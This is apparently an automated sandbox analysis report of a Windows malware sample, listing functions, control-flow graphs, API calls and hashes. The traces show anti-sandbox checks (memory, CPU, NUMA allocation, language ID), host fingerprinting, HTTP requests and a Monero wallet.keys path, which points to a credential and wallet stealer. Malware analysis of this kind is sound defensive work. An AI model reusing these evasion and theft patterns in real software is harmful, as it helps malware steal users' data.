                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                              • Instruction ID: 2577da46c9b6528a0d03d9ddbe5fa3db44c0c9ebfe01b7f52115247d2d186c0d
                              • Opcode Fuzzy Hash: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                              • Instruction Fuzzy Hash: F8715F71A40218ABEB24DFA4CC49BEE7778FF44701F108198F5096B190DBB4AA85CF62
                              Function 00D45510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 d45510-d45577 call d45ad0 call d4a820 * 3 call d4a740 * 4 1106 d4557c-d45583 1090->1106 1107 d45585-d455b6 call d4a820 call d4a7a0 call d31590 call d451f0 1106->1107 1108 d455d7-d4564c call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1106->1108 1124 d455bb-d455d2 call d4a8a0 call d4a800 1107->1124 1134 d45693-d456a9 call d4aad0 StrCmpCA 1108->1134 1137 d4564e-d4568e call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1108->1137 1124->1134 1140 d457dc-d45844 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1134->1140 1141 d456af-d456b6 1134->1141 1137->1134 1272 d45ac3-d45ac6 1140->1272 1142 d456bc-d456c3 1141->1142 1143 d457da-d4585f call d4aad0 StrCmpCA 1141->1143 1146 d456c5-d45719 call d4a820 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1142->1146 1147 d4571e-d45793 call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1142->1147 1161 d45865-d4586c 1143->1161 1162 d45991-d459f9 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1143->1162 1146->1143 1147->1143 1250 d45795-d457d5 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1147->1250 1167 d45872-d45879 1161->1167 1168 d4598f-d45a14 call d4aad0 StrCmpCA 1161->1168 1162->1272 1174 d458d3-d45948 call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1167->1174 1175 d4587b-d458ce call d4a820 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1167->1175 1197 d45a16-d45a21 Sleep 1168->1197 1198 d45a28-d45a91 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1168->1198 1174->1168 1276 d4594a-d4598a call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1143 1276->1168
                              APIs
                                • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                                • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D456A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45857
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                                • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D4532F
                                • Part of subcall function 00D452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                                • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D45383
                                • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D453AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D4578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00D45A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                              • Instruction ID: fab478a7b59183dd729af1a3969306e06b8f6b67735528ee0e4710c51d29941d
                              • Opcode Fuzzy Hash: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                              • Instruction Fuzzy Hash: B2E11E769501089BDB14FBB4EC97AED7338EF94300F508528B50666196EF34AA4DCBB3
                              Function 00D417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 d417a0-d417cd call d4aad0 StrCmpCA 1304 d417d7-d417f1 call d4aad0 1301->1304 1305 d417cf-d417d1 ExitProcess 1301->1305 1309 d417f4-d417f8 1304->1309 1310 d419c2-d419cd call d4a800 1309->1310 1311 d417fe-d41811 1309->1311 1313 d41817-d4181a 1311->1313 1314 d4199e-d419bd 1311->1314 1316 d41835-d41844 call d4a820 1313->1316 1317 d41970-d41981 StrCmpCA 1313->1317 1318 d418f1-d41902 StrCmpCA 1313->1318 1319 d41951-d41962 StrCmpCA 1313->1319 1320 d41932-d41943 StrCmpCA 1313->1320 1321 d41913-d41924 StrCmpCA 1313->1321 1322 d4185d-d4186e StrCmpCA 1313->1322 1323 d4187f-d41890 StrCmpCA 1313->1323 1324 d41821-d41830 call d4a820 1313->1324 1325 d418ad-d418be StrCmpCA 1313->1325 1326 d418cf-d418e0 StrCmpCA 1313->1326 1327 d4198f-d41999 call d4a820 1313->1327 1328 d41849-d41858 call d4a820 1313->1328 1314->1309 1316->1314 1336 d41983-d41986 1317->1336 1337 d4198d 1317->1337 1350 d41904-d41907 1318->1350 1351 d4190e 1318->1351 1333 d41964-d41967 1319->1333 1334 d4196e 1319->1334 1331 d41945-d41948 1320->1331 1332 d4194f 1320->1332 1329 d41926-d41929 1321->1329 1330 d41930 1321->1330 1342 d41870-d41873 1322->1342 1343 d4187a 1322->1343 1344 d41892-d4189c 1323->1344 1345 d4189e-d418a1 1323->1345 1324->1314 1346 d418c0-d418c3 1325->1346 1347 d418ca 1325->1347 1348 d418e2-d418e5 1326->1348 1349 d418ec 1326->1349 1327->1314 1328->1314 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1336->1337 1337->1314 1342->1343 1343->1314 1355 d418a8 1344->1355 1345->1355 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00D417C5
                              • ExitProcess.KERNEL32 ref: 00D417D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 6ef2d39a50a4ea13370b0747a44ab8dfbad2b4012f5025b06d9d0a0caba32153
                              • Instruction ID: 872378a359984a43164757fa34284cbb92d55a02e698ecca10f68059506940ca
                              • Opcode Fuzzy Hash: 6ef2d39a50a4ea13370b0747a44ab8dfbad2b4012f5025b06d9d0a0caba32153
                              • Instruction Fuzzy Hash: 685143B9A1420AEFDB04DFA4D954BBE7BB5BB44305F108049E81AAB240D770E985DF72
                              Function 00D47500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 d47500-d4754a GetWindowsDirectoryA 1357 d47553-d475c7 GetVolumeInformationA call d48d00 * 3 1356->1357 1358 d4754c 1356->1358 1365 d475d8-d475df 1357->1365 1358->1357 1366 d475e1-d475fa call d48d00 1365->1366 1367 d475fc-d47617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 d47628-d47658 wsprintfA call d4a740 1367->1368 1369 d47619-d47626 call d4a740 1367->1369 1377 d4767e-d4768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D47542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D4760A
                              • wsprintfA.USER32 ref: 00D47640
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                              • Instruction ID: 5e7afc32cd026c07d18de93a34a216481f68d57a9a25cda5a408f8625ea13496
                              • Opcode Fuzzy Hash: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                              • Instruction Fuzzy Hash: 744181B1D04248ABDF10DF94DC45BEEBBB8EF48704F144199F50967280D774AA84CBB6
                              Function 00D469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0570), ref: 00D498A1
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0798), ref: 00D498BA
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0600), ref: 00D498D2
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0810), ref: 00D498EA
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D07B0), ref: 00D49903
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D8880), ref: 00D4991B
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008C6820), ref: 00D49933
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008C6840), ref: 00D4994C
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D07F8), ref: 00D49964
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0828), ref: 00D4997C
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D05B8), ref: 00D49995
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D05D0), ref: 00D499AD
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008C69A0), ref: 00D499C5
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D05E8), ref: 00D499DE
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D311D0: ExitProcess.KERNEL32 ref: 00D31211
                                • Part of subcall function 00D31160: GetSystemInfo.KERNEL32(?), ref: 00D3116A
                                • Part of subcall function 00D31160: ExitProcess.KERNEL32 ref: 00D3117E
                                • Part of subcall function 00D31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                                • Part of subcall function 00D31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                                • Part of subcall function 00D31110: ExitProcess.KERNEL32 ref: 00D31143
                                • Part of subcall function 00D31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                                • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31258
                                • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31266
                                • Part of subcall function 00D31220: ExitProcess.KERNEL32 ref: 00D31294
                                • Part of subcall function 00D46770: GetUserDefaultLangID.KERNEL32 ref: 00D46774
                                • Part of subcall function 00D31190: ExitProcess.KERNEL32 ref: 00D311C6
                                • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                                • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                                • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                                • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                                • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                                • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                              • Sleep.KERNEL32(00001770), ref: 00D46B04
                              • CloseHandle.KERNEL32(?,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                              • ExitProcess.KERNEL32 ref: 00D46B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                              • Instruction ID: daf7506ad8c9c499867baae75680c784f06872c1690c24ecbf5fc35296239abb
                              • Opcode Fuzzy Hash: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                              • Instruction Fuzzy Hash: B6312870940209ABEB04FBF4DC56BEE7778EF44341F414518F602A2182DF70A945CAB3
                              Function 00D31220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 d31220-d31247 call d489b0 GlobalMemoryStatusEx 1439 d31273-d3127a 1436->1439 1440 d31249-d31271 call d4da00 * 2 1436->1440 1441 d31281-d31285 1439->1441 1440->1441 1443 d31287 1441->1443 1444 d3129a-d3129d 1441->1444 1447 d31292-d31294 ExitProcess 1443->1447 1448 d31289-d31290 1443->1448 1448->1444 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                              • __aulldiv.LIBCMT ref: 00D31258
                              • __aulldiv.LIBCMT ref: 00D31266
                              • ExitProcess.KERNEL32 ref: 00D31294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                              • Instruction ID: fd73c530da668f46597e26511e9cfa144752eb07a4bfa1de234f005ff74c8c19
                              • Opcode Fuzzy Hash: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                              • Instruction Fuzzy Hash: 3A016DB4D40309BBEB10EFE4CC4AB9EBBB8EB14705F248048E705B62C0D77495418BAD
                              Function 00D46AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 d46af3 1451 d46b0a 1450->1451 1453 d46b0c-d46b22 call d46920 call d45b10 CloseHandle ExitProcess 1451->1453 1454 d46aba-d46ad7 call d4aad0 OpenEventA 1451->1454 1460 d46af5-d46b04 CloseHandle Sleep 1454->1460 1461 d46ad9-d46af1 call d4aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                              • Sleep.KERNEL32(00001770), ref: 00D46B04
                              • CloseHandle.KERNEL32(?,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                              • ExitProcess.KERNEL32 ref: 00D46B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                              • Instruction ID: 59aa43c63c7ee39f69ae1c226f20b9de7e2c9da13724a7b908c72b56e9f0f064
                              • Opcode Fuzzy Hash: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                              • Instruction Fuzzy Hash: 2CF0F870A4021DABE710ABA0EC0ABBE7B74EB45741F104914B517A51D1DBB09981EAB7
